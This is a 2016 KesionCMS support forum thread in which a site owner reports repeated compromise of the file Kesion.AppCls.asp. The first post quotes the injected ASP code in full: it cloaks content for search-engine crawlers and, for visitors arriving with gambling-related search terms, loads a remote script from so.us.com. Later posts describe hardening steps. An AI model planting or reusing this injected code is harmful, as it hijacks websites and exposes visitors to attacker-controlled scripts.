网站被挂马、清除了又来了，官方有解决办法没？-领先建站CMS提供服务商我们专注于CMS建站产品的研发

kesion

<<返回列表上一个主题下一个主题打印本帖复制本帖地址

4095 查看	4 回复

主题：[求助]网站被挂马、清除了又来了，官方有解决办法没？ [收藏主题]

转到：

cnszz 当前离线

294 主题	2 广播	0 粉丝

添加关注

级别:二年级

用户积分:516 分
登录次数:153 次
注册时间:2011/2/20
最后登录:2022/5/6

当前不在线

cnszz 发表于：2016/11/22 9:31:41 | 显示全部帖子查看该作者主题楼主

科汛智能建站系统

做考试题库就用#科汛在线考试系统!

从上个月19号开始，Kesion.AppCls.asp这个文件一直被挂马，但不清楚是通过什么途径挂上去的，我想知道你们是否也出现了同样情况，最后怎么解决的？被挂上去的代码如下：

<%Function getFileSize(FileName)if FileName="" then getFileSize="0KB" Exit Functionend if Dim oFso,oFile,sFilesFile=FileNameSet oFso=Server.CreateObject("Scripting.FileSystemObject")If oFso.FileExists(Server.MapPath(sFile)) Then Set oFile=oFso.GetFile(Server.MapPath(sFile))getFileSize= CStr( CDbl( FormatNumber( oFile.Size / 1024))) & "KB"elsegetFileSize="0KB" Exit Function end if Set oFile=nothing Set oFso=nothingEnd Functionfunction isspider()dim agent,searray,iagent="agent:"&LCase(request.servervariables("http_user_agent"))searray=array("sogou","bing","so","360","soso","yahoo","sm") isspider= falsefor i=0 to ubound(searray) if (instr(agent,searray(i))>0) then isspider=truenextend functionfunction mainpage()dim mainindex,n,pagearray,indexquery,imainindex=LCase(request.ServerVariables("SCRIPT_NAME"))indexquery=LCase(request.ServerVariables("QUERY_STRING"))mainpage= falsepagearray=array("/index.","/default.","/main.")for i=0 to ubound(pagearray) if (instr(mainindex,pagearray(i))>0 and len(indexquery)<2) then mainpage=truenextend functionif isspider() and mainpage() then dim mfso,mfileurl,mfilecon,wfile mfileurl=Server.MapPath("/images/home1.gif") Set mfso=Server.CreateObject("Scripting.FileSystemObject") if mfso.FileExists(mfileurl) then Set wfile=mfso.OpenTextFile(mfileurl, 1) mfilecon=wfile.readAll response.clear response.write(mfilecon) response.write("") response.flush wfile.Close Set wfile=Nothing Set mfso=Nothing response.end else response.write("fn") end ifend ifDim p,runjs,rfr,reg,x_array,i,runjs_ap="(sogou)|(bing)|(so)|(360)|(soso)|(yahoo)|(sm)|(lanjie)"rfr=UCase(request.ServerVariables("HTTP_REFERER"))runjs_a = 0runjs = 0Set reg = new regexpreg.ignorecase = Truereg.global = Truereg.pattern = pIf reg.test(rfr) Then runjs_a = 1End ifSet reg = Nothingx_array=Array("%C1%F9","%E5%85%AD","%BA%CF","%E5%90%88","%BA%CD","%E5%92%8C","%B2%CA","%E5%BD%A9","%CC%D8","%E7%89%B9","%C2%EB","%E7%A0%81","%BD%B1","%E5%A5%96","%C6%DA","%E6%9C%9F","%D0%A4","%E8%82%96","%CD%BC","%E5%9B%BE","lhc","lhc","%CF%E3%B8%DB","%E9%A6%99%E6%B8%AF","6%BA%CF","6%E5%90%88","%C2%ED%BB%E1","%E9%A9%AC%E4%BC%9A","%CC%D8%C2%EB","%E7%89%B9%E7%A0%81","%C2%DB%CC%B3","%E8%AE%BA%E5%9D%9B","%C1%F9%BA%CF","%E5%85%AD%E5%90%88","%BF%AA%BD%B1","%E5%BC%80%E5%A5%96","%BD%E1%B9%FB","%E7%BB%93%E6%9E%9C","%CD%BC%BF%E2","%E5%9B%BE%E5%BA%93","%D0%C4%CB%AE","%E5%BF%83%E6%B0%B4","%B9%DC%BC%D2%C6%C5","%E7%AE%A1%E5%AE%B6%E5%A9%86","%B0%D7%D0%A1%BD%E3","%E7%99%BD%E5%B0%8F%E5%A7%90","%D7%DF%CA%C6%CD%BC","%E8%B5%B0%E5%8A%BF%E5%9B%BE","%C0%CF%C7%AE%D7%AF","%E8%80%81%E9%92%B1%E5%BA%84","%D4%F8%B5%C0%C8%CB","%E6%9B%BE%E9%81%93%E4%BA%BA","%BF%AA%BD%B1%D6%B1%B2%A5","%E5%BC%80%E5%A5%96%E7%9B%B4%E6%92%AD","%B1%BE%C6%DA","%E6%9C%AC%E6%9C%9F","%D6%B1%B2%A5","%E7%9B%B4%E6%92%AD","%D7%CA%C1%CF","%E8%B5%84%E6%96%99","%CF%D6%B3%A1","%E7%8E%B0%E5%9C%BA","%BC%C7%C2%BC","%E8%AE%B0%E5%BD%95","%B1%A8","%E6%8A%A5","%CD%BC%D6%BD","%E5%9B%BE%E7%BA%B8","%CD%F8%D6%B7","%E7%BD%91%E5%9D%80","%B4%F3%C8%AB","%E5%A4%A7%E5%85%A8","%D0%FE%BB%FA","%E7%8E%84%E6%9C%BA","%D4%A4%B2%E2","%E9%A2%84%E6%B5%8B","%B9%AB%CA%BD","%E5%85%AC%E5%BC%8F","%BA%C5%C2%EB","%E5%8F%B7%E7%A0%81","%B5%D8%CF%C2","%E5%9C%B0%E4%B8%8B","%B9%D2%C5%C6","%E6%8C%82%E7%89%8C","%B2%D8%B1%A6","%E8%97%8F%E5%AE%9D","%C3%E2%B7%D1","%E5%85%8D%E8%B4%B9","%C0%FA%CA%B7","%E5%8E%86%E5%8F%B2","%CC%EC%CF%DF","%E5%A4%A9%E7%BA%BF","%CC%FA%CB%E3%C5%CC","%E9%93%81%E7%AE%97%E7%9B%98","%BA%EC%BD%E3","%E7%BA%A2%E5%A7%90","%D0%C4%BE%AD","%E5%BF%83%E7%BB%8F","mahui","tema","xianggang")For i=0 To UBound(x_array) If(InStr(rfr,x_array(i))>0) Then runjs=1 Exit For End IfNextif (mainpage() and runjs=1 and runjs_a = 1) then response.clear response.write "OK" response.write("<scri"&"pt lang"&"uage='jav"&"as"&"cri"&"pt' src='http://so.us.com/1.js'></sc"&"ript><br/>") response.flush response.endend if%>

一分钟快速开通线上知识店铺

反对(0)

回到顶部

回到底部

底部

cnszz 当前离线

294 主题	2 广播	0 粉丝

添加关注

级别:二年级

用户积分:516 分
登录次数:153 次
注册时间:2011/2/20
最后登录:2022/5/6

当前不在线

cnszz 发表于：2016/11/24 12:16:50 | 显示全部帖子查看该作者主题沙发

科汛在线网校系统

做官网就用科汛智能建站系统!

程序是最新版的，KS_cLS目录已经关闭了写入权限，现在首页文件（index.asp）又被改了，我很想知道他是从什么漏洞进来的？后台路径、数据库名、管理密码、文件夹访问权限、我能想到的都设了限制，当改的也改了，居然还能进来改不能设只读权限的文件

做考试题库就用#科汛在线考试系统!

反对(0)

回到顶部

回到底部

底部

cnszz 当前离线

294 主题	2 广播	0 粉丝

添加关注

级别:二年级

用户积分:516 分
登录次数:153 次
注册时间:2011/2/20
最后登录:2022/5/6

当前不在线

cnszz 发表于：2016/11/25 9:38:35 | 显示全部帖子查看该作者主题藤椅

科汛在线考试系统(NET)

有课程找生源就上科汛课堂街

用的西部数码商务型的虚拟空间，服务器我是动不了，问过空间商是否同个服务器上的其他网站也有我这种情况，那边回应是没有出现过，不过昨天我把站内搜索、上传关闭，会员全部清空并关闭了注册后，清除了所有被挂马的文件，到现在为止已经没被挂马，终于正常了。

做官网就用科汛智能建站系统!

反对(0)

回到顶部

回到底部

底部

＜上一主题 | 下一主题＞

Powered By KesionCMS Version X1

厦门科汛软件有限公司 © 2006-2016 页面执行0.20313秒 powered by KesionCMS 9.0